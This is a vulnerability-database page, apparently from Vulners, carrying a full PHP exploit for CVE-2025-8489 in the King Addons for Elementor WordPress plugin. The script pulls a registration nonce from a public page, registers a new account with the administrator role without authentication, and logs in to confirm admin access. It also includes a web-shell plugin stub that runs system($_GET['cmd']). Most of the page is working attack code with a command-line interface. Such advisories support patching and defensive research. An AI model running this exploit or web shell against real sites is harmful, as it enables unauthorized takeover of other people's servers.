Vulners
Lucene search
📄 WordPress King Addons for Elementor 51.1.14 Privilege Escalation
| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
 | Exploit for CVE-2025-8489 | 17 Jan 202602:59 | – | githubexploit |
 | CVE-2025-8489 | 31 Oct 202507:32 | – | circl |
 | WordPress plugin King Addons for Elementor 安全漏洞 | 31 Oct 202500:00 | – | cnnvd |
 | WordPress King Addons for Elementor plugin elevation of privilege vulnerability | 5 Nov 202500:00 | – | cnvd |
 | CVE-2025-8489 | 31 Oct 202506:42 | – | cve |
 | CVE-2025-8489 King Addons for Elementor – Free Elements, Widgets, Templates, and Features for Elementor 24.12.92 - 51.1.14 - Unauthenticated Privilege Escalation | 31 Oct 202506:42 | – | cvelist |
 | EUVD-2025-37306 | 31 Oct 202509:30 | – | euvd |
 | WordPress King Addons for Elementor Unauthenticated Privilege Escalation to RCE | 10 Dec 202518:57 | – | metasploit |
 | CVE-2025-8489 | 31 Oct 202507:15 | – | nvd |
 | 📄 WordPress King Addons for Elementor Privilege Escalation / Remote Code Execution | 11 Dec 202500:00 | – | packetstorm |
10
=============================================================================================================================================
| # Title : WordPress King Addons for Elementor 24.12.92 to 51.1.14 Unauthenticated Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://wordpress.org/plugins/king-addons/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212728/ & CVE-2025-8489
[+] Summary : The vulnerability exists in the handle_register_ajax() function within the King Addons plugin.
This function improperly handles user registration without proper authorization checks, allowing attackers to specify the user_role parameter during registration.
[+] Attack Vector :
Unauthenticated Registration: Attackers can register new users without authentication
Role Manipulation: The user_role parameter can be set to "administrator"
Nonce Requirement: Requires a valid nonce exposed on pages containing the "Login Register Form" widget
[+] POC :
php poc.php https://vulnerable-site.com /register-page/ \
--username indoushka \
--password P@ssw0rd123! \
--email [email protected]
<?php
class WordPressKingAddonsExploit {
private $targetUrl;
private $username;
private $password;
private $email;
private $noncePage;
private $cookieJar = [];
public function __construct($targetUrl, $noncePage, $username, $password, $email) {
$this->targetUrl = rtrim($targetUrl, '/');
$this->noncePage = $noncePage;
$this->username = $username;
$this->password = $password;
$this->email = $email;
}
/**
* تنفيذ الاستغلال
*/
public function exploit() {
echo "[*] Starting exploit for CVE-2025-8489\n";
// الخطوة 1: البحث عن nonce
echo "[*] Searching for nonce on page: {$this->noncePage}\n";
$nonce = $this->findNonce();
if (!$nonce) {
echo "[-] Failed to find nonce\n";
return false;
}
echo "[+] Found nonce: $nonce\n";
// الخطوة 2: إنشاء مستخدم بصلاحيات مدير
echo "[*] Creating administrator account\n";
$userCreated = $this->createAdminUser($nonce);
if (!$userCreated) {
echo "[-] Failed to create administrator account\n";
return false;
}
echo "[+] Administrator account created\n";
echo "[*] Username: {$this->username}\n";
echo "[*] Password: {$this->password}\n";
// الخطوة 3: تسجيل الدخول كمدير
echo "[*] Logging in as administrator\n";
$adminCookie = $this->wordpressLogin();
if (!$adminCookie) {
echo "[-] Failed to login as administrator\n";
return false;
}
echo "[+] Successfully logged in\n";
return [
'username' => $this->username,
'password' => $this->password,
'cookie' => $adminCookie
];
}
/**
* البحث عن nonce في الصفحة المحددة
*/
private function findNonce() {
$url = $this->targetUrl . '/' . ltrim($this->noncePage, '/');
$html = $this->httpGet($url);
if (!$html) {
return null;
}
// البحث عن nonce في JavaScript
preg_match('/king_addons_login_register_vars\s*=\s*({[^;]+})/', $html, $matches);
if (isset($matches[1])) {
$jsonStr = str_replace('\/', '/', $matches[1]);
$data = json_decode($jsonStr, true);
if (isset($data['register_nonce']) && !empty($data['register_nonce'])) {
return $data['register_nonce'];
}
}
return null;
}
/**
* إنشاء مستخدم بصلاحيات مدير
*/
private function createAdminUser($nonce) {
$ajaxUrl = $this->targetUrl . '/wp-admin/admin-ajax.php';
$postData = [
'action' => 'king_addons_user_register',
'nonce' => $nonce,
'username' => $this->username,
'email' => $this->email,
'password' => $this->password,
'confirm_password' => $this->password,
'user_role' => 'administrator',
'terms_required' => 'no'
];
$response = $this->httpPost($ajaxUrl, $postData);
if (!$response) {
return false;
}
$json = json_decode($response, true);
if (isset($json['success']) && $json['success'] === true) {
return true;
}
// التحقق إذا كان المستخدم موجوداً مسبقاً
if (isset($json['success']) && $json['success'] === false) {
$errorMsg = isset($json['data']['message']) ? $json['data']['message'] : '';
if (preg_match('/(already exists|username.*taken|user.*exists)/i', $errorMsg)) {
echo "[!] User already exists, attempting to use existing account\n";
return true;
}
}
return false;
}
/**
* تسجيل الدخول إلى ووردبريس
*/
private function wordpressLogin() {
$loginUrl = $this->targetUrl . '/wp-login.php';
$postData = [
'log' => $this->username,
'pwd' => $this->password,
'wp-submit' => 'Log In',
'redirect_to' => $this->targetUrl . '/wp-admin/',
'testcookie' => '1'
];
$headers = [
'Content-Type: application/x-www-form-urlencoded',
'Referer: ' . $loginUrl
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $loginUrl);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($httpCode === 200 || $httpCode === 302) {
// استخراج الكوكيز
preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $response, $matches);
$cookies = [];
foreach($matches[1] as $item) {
parse_str($item, $cookie);
$cookies = array_merge($cookies, $cookie);
}
// بناء سلسلة الكوكيز
$cookieStr = '';
foreach($cookies as $key => $value) {
$cookieStr .= "$key=$value; ";
}
// التحقق من الصلاحيات
$adminUrl = $this->targetUrl . '/wp-admin/';
$adminPage = $this->httpGet($adminUrl, $cookieStr);
if (strpos($adminPage, 'wp-admin-bar') !== false) {
return $cookieStr;
}
}
return false;
}
/**
* رفع وتنفيذ ملف اختراق (Proof of Concept فقط)
*/
public function uploadMaliciousPlugin($adminCookie) {
echo "[*] Warning: This function demonstrates file upload capability\n";
echo "[*] For educational purposes only!\n";
// هذا مجرد مثال توضيحي
$pluginContent = '<?php
/**
* Plugin Name: Malicious Demo
* Description: Proof of Concept - DO NOT USE IN PRODUCTION
*/
if (isset($_GET["cmd"]) && current_user_can("administrator")) {
system($_GET["cmd"]);
}
?>';
// Note: Actual plugin upload requires more complex implementation
// involving ZIP creation and WordPress upload mechanisms
return false;
}
/**
* طلب HTTP GET
*/
private function httpGet($url, $cookie = '') {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
if ($cookie) {
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
}
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return ($httpCode == 200) ? $response : false;
}
/**
* طلب HTTP POST
*/
private function httpPost($url, $data, $cookie = '') {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
if ($cookie) {
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
}
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return ($httpCode == 200) ? $response : false;
}
}
/**
* واجهة سطر الأوامر (CLI)
*/
if (php_sapi_name() === 'cli') {
echo "=== WordPress King Addons Exploit (CVE-2025-8489) ===\n\n";
if ($argc < 3) {
echo "Usage: php " . basename(__FILE__) . " [target_url] [nonce_page_path]\n";
echo "Example: php exploit.php https://example.com /page-with-form/\n\n";
echo "Optional parameters:\n";
echo " --username [username] (default: random)\n";
echo " --password [password] (default: random)\n";
echo " --email [email] (default: random)\n";
exit(1);
}
$targetUrl = $argv[1];
$noncePage = $argv[2];
// القيم الافتراضية
$username = 'admin_' . substr(md5(time()), 0, 8);
$password = substr(md5(time()), 0, 12);
$email = substr(md5(time()), 0, 8) . '@example.com';
// معالجة الوسائط الإضافية
for ($i = 3; $i < $argc; $i++) {
if ($argv[$i] === '--username' && isset($argv[$i+1])) {
$username = $argv[++$i];
} elseif ($argv[$i] === '--password' && isset($argv[$i+1])) {
$password = $argv[++$i];
} elseif ($argv[$i] === '--email' && isset($argv[$i+1])) {
$email = $argv[++$i];
}
}
// تنفيذ الاستغلال
$exploit = new WordPressKingAddonsExploit($targetUrl, $noncePage, $username, $password, $email);
$result = $exploit->exploit();
if ($result) {
echo "\n[+] Exploit successful!\n";
echo "[+] Administrator credentials:\n";
echo " URL: " . $targetUrl . "/wp-admin/\n";
echo " Username: " . $result['username'] . "\n";
echo " Password: " . $result['password'] . "\n";
echo "\n[!] Important: Remove the created user after testing!\n";
} else {
echo "\n[-] Exploit failed\n";
}
} else {
echo "This script is intended for command line use.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Mar 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.8
EPSS0.49263
SSVC